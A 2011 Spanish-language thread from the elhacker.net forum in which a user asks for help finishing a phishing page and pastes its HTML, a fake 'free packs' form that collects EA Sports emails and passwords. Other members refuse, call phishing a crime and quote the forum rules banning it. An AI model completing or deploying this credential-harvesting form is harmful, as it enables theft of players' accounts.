elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  Ayuda en HTML primera vez
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda en HTML primera vez  (Leído 2,944 veces)
P4NCH0 V1P

Desconectado Desconectado

Mensajes: 2



Ver Perfil WWW
Ayuda en HTML primera vez
« en: 4 Febrero 2011, 04:27 am »

Buenas tardes hoy necesito que me hechen una manita! haha lo que necesito es que me ayuden a programar este codigo HTML hehe necesito que cuando los usuarios se registren los redireccione a la pagina de inicio y me quede ami un log de la web es algo asi como phishing en fin es mi primera vez en proga y pues me esta pasando peor de lo que pense!

Citar
<h2>Sign Up for Free Packs</h2>
    
    <form method='post' action='http://freegoldpremiumpack.yolasite.com/'>
        
            
                    
                                                          <p class='label'><label for='yola_form_widget_I30_0'>EA Sports Email</label></p>  
                                            
                                    <input id='yola_form_widget_I30_0' class='text' name='0<text>' type='text' value='' />
                        
                <input type='hidden' name='0<label>' value='EA Sports Email' />
        
                    
                                                          <p class='label'><label for='yola_form_widget_I30_1'>Password (case sensitive)</label></p>  
                                            
                                    <input id='yola_form_widget_I30_1' class='text' name='1<text>' type='text' value='' />
                        
                <input type='hidden' name='1<label>' value='Password (case sensitive)' />
        
            
            <input type='hidden' name='redirect' value='http://freegoldpremiumpack.yolasite.com/' />
            <input type='hidden' name='redirect_fail' value='http://freegoldpremiumpack.yolasite.com/' />
            <input type='hidden' name='form_name' value='Sign Up for Free Packs' />
            <input type='hidden' name='site_name' value='FREE GOLD PREMIUM PACK' />
                        <input type='hidden' name='destination' value='http://freegoldpremiumpack.yolasite.com/' />
            
                            <p><input class='submit' type="submit" value="Submit" /></p>



« Última modificación: 4 Febrero 2011, 04:31 am por P4NCH0 V1P » En línea

Spider-Net


Desconectado Desconectado

Mensajes: 1.165


Un gran poder conlleva una gran responsabilidad


Ver Perfil WWW
Re: Ayuda en HTML primera vez
« Respuesta #1 en: 4 Febrero 2011, 11:07 am »

Creo que te has equivocado de foro si tu intención es venir a pedir ayuda para realizar ataques de phishing. Al menos podrías disimular un poco, ¿crees que alguien va a venir a ayudarte a cometer un delito? Que sepas que el phishing ya es considerado un delito por la ley y existen penas de prisión por este tipo de delitos.

NOTA: HTML NO es un lenguaje de programación, es un lenguaje de marcas de hipertexto, deberías estudiar un poquito antes de preguntar, y deberías de utilizar tus conocimientos para hacer algo productivo en lugar de para robar datos a la gente.


En línea

RyogiShiki


Desconectado Desconectado

Mensajes: 745


げんしけん - Hikkikomori FTW!!!


Ver Perfil WWW
Re: Ayuda en HTML primera vez
« Respuesta #2 en: 4 Febrero 2011, 21:14 pm »

entonces quieres robarte algunas cuentas de EA Sports.

Como dicen arriba es un delito. Si no estoy mal va en contra de las normas del Foro y nadie te va a ayudar con esto.
En línea

P4NCH0 V1P

Desconectado Desconectado

Mensajes: 2



Ver Perfil WWW
Re: Ayuda en HTML primera vez
« Respuesta #3 en: 5 Febrero 2011, 00:25 am »

 >:( es que sinceramente no es con afan de robar identidades por que ami eso no me intersa si no que sacar jugadores en FIFA Ultimate Team para venderlos y hacer coins y Spider-net si tuviera los conosimientos adecuados obviamente no pediria ayuda y esta es una web underground y el nombre es el hacker entonces cual es el punto de no hacer phishing y cosas ilegales por que no se que tanto esto ha cambiado por que cual es la razon por la que no me ayudarian con esto pero si ayudarian a alguien mas a programar un software x con malas intenciones???por que el hacking tambien es considerado un delito en fin no me quieres tomar por new bite por que no lo soy talves pensaras por que apenas tengo 3 post no se nada pero no es asi en fin si me quieren ayudar se los agradeceria y si no pues tambien gracias de antemano.
En línea

RyogiShiki


Desconectado Desconectado

Mensajes: 745


げんしけん - Hikkikomori FTW!!!


Ver Perfil WWW
Re: Ayuda en HTML primera vez
« Respuesta #4 en: 5 Febrero 2011, 01:28 am »

>:( es que sinceramente no es con afan de robar identidades por que ami eso no me intersa si no que sacar jugadores en FIFA Ultimate Team para venderlos y hacer coins y Spider-net si tuviera los conosimientos adecuados obviamente no pediria ayuda y esta es una web underground y el nombre es el hacker entonces cual es el punto de no hacer phishing y cosas ilegales por que no se que tanto esto ha cambiado por que cual es la razon por la que no me ayudarian con esto pero si ayudarian a alguien mas a programar un software x con malas intenciones???por que el hacking tambien es considerado un delito en fin no me quieres tomar por new bite por que no lo soy talves pensaras por que apenas tengo 3 post no se nada pero no es asi en fin si me quieren ayudar se los agradeceria y si no pues tambien gracias de antemano.

Jamás has escuchado el concepto de Hacking ético, o el de HAcking con fines pedagógicos educativos, o simplemente para aprender cosas nuevas sin hacer daño a nadie, pero adquiriendo conocimiento que se puede usar en diversas areas

Además creo que has malentendido el concepto de "hacker" desde un principio! si verificas y lees un poco más acerca del concepto entonces podrás entender mejor las cosas
« Última modificación: 5 Febrero 2011, 01:33 am por gankutsuo » En línea

flacc


Desconectado Desconectado

Mensajes: 854



Ver Perfil WWW
Re: Ayuda en HTML primera vez
« Respuesta #5 en: 5 Febrero 2011, 08:48 am »

y uno que se entretiene aprendiendo a crear una web, o leyendo sobre programacion, si queres dinero has como todos, TRABAJA, o pon un blog y atrae publico para tener un cheque de adsence... saludos
En línea

Spider-Net


Desconectado Desconectado

Mensajes: 1.165


Un gran poder conlleva una gran responsabilidad


Ver Perfil WWW
Re: Ayuda en HTML primera vez
« Respuesta #6 en: 5 Febrero 2011, 19:28 pm »

>:( es que sinceramente no es con afan de robar identidades por que ami eso no me intersa si no que sacar jugadores en FIFA Ultimate Team para venderlos y hacer coins y Spider-net si tuviera los conosimientos adecuados obviamente no pediria ayuda y esta es una web underground y el nombre es el hacker entonces cual es el punto de no hacer phishing y cosas ilegales por que no se que tanto esto ha cambiado por que cual es la razon por la que no me ayudarian con esto pero si ayudarian a alguien mas a programar un software x con malas intenciones???por que el hacking tambien es considerado un delito en fin no me quieres tomar por new bite por que no lo soy talves pensaras por que apenas tengo 3 post no se nada pero no es asi en fin si me quieren ayudar se los agradeceria y si no pues tambien gracias de antemano.

Yo no entiendo de donde sale tanto troll últimamente...

Que la web se llame elhacker.net no quiere decir que aquí se cometa ni se ayude a cometer ningún delito, es obvio que no conoces este foro ni su funcionamiento. Te invito a leer las normas del foro antes de postear: http://foro.elhacker.net/reglas&pli=1

Y en especial a este apartado:
Citar
I.A.1.b. Temas prohibidos.

    Para mantener un control sobre el contenido del foro, así como de su uso y legalidad, ciertos temas deben ser controlados, temas con este contenido podrían ser borrados o cerrados.

    Estos temas no pueden ser discutidos en el foro en absoluto, y la acción de hablar de ellos continuamente podría conllevar a una de las sanciones especificadas en la sección III.C, dichos temas son:

Phishing.
Pornografía (aún en el caso que sea legal no está permitida en el foro)
Discriminación.
Asuntos personales de terceros.
Actividades criminales
Solicitar Cracks y/o Serials
Hacking no ético
Juegos y aplicaciones piratas*.


    El motivo de que estos temas no puedan ser tratados en el foro, es debido a que no promovemos su difusión y/o al ser tratados, se estarían violando los derechos y la dignidad de otras personas.

No pienso que seas un newbie porque tengas 3 post. Pienso que eres un lammer porque es obvio que tienes escasos conocimientos sobre desarrollo web y encima pretendes utilizarlos para robar cuentas. Que un foro trate temas de hacking no quiere decir que se fomente que la gente cometa delitos ni que se ayude a hacerlo.

Aunque te parezca una burrada la mayoría de usuarios de este foro están aquí porque son gente curiosa, les gusta aprender y compartir sus conocimientos y no para hackear la red wifi del vecino ni para robarle la cuenta del msn o del tuenti a la novia. Así que como ya te dije antes, si tus objetivos son esos, te equivocaste de foro.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda:¿Cual consola es mejor? es la primera vez que voy a comprar una « 1 2 »
Juegos y Consolas
alybelle 11 4,599 Último mensaje 12 Diciembre 2005, 03:39 am
por Ragnarok
Primera ayuda
Ingeniería Inversa
Angelo8 1 1,984 Último mensaje 23 Julio 2008, 22:30 pm
por apuromafo CLS
SQL: mi primera base de datos, ayuda
.NET (C#, VB.NET, ASP)
nico56 3 3,369 Último mensaje 23 Diciembre 2009, 14:31 pm
por nico56
Mi primera Pagina Web (Ayuda) « 1 2 »
Desarrollo Web
Z3R0 BOOM 11 5,897 Último mensaje 9 Noviembre 2010, 23:09 pm
por Z3R0 BOOM
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines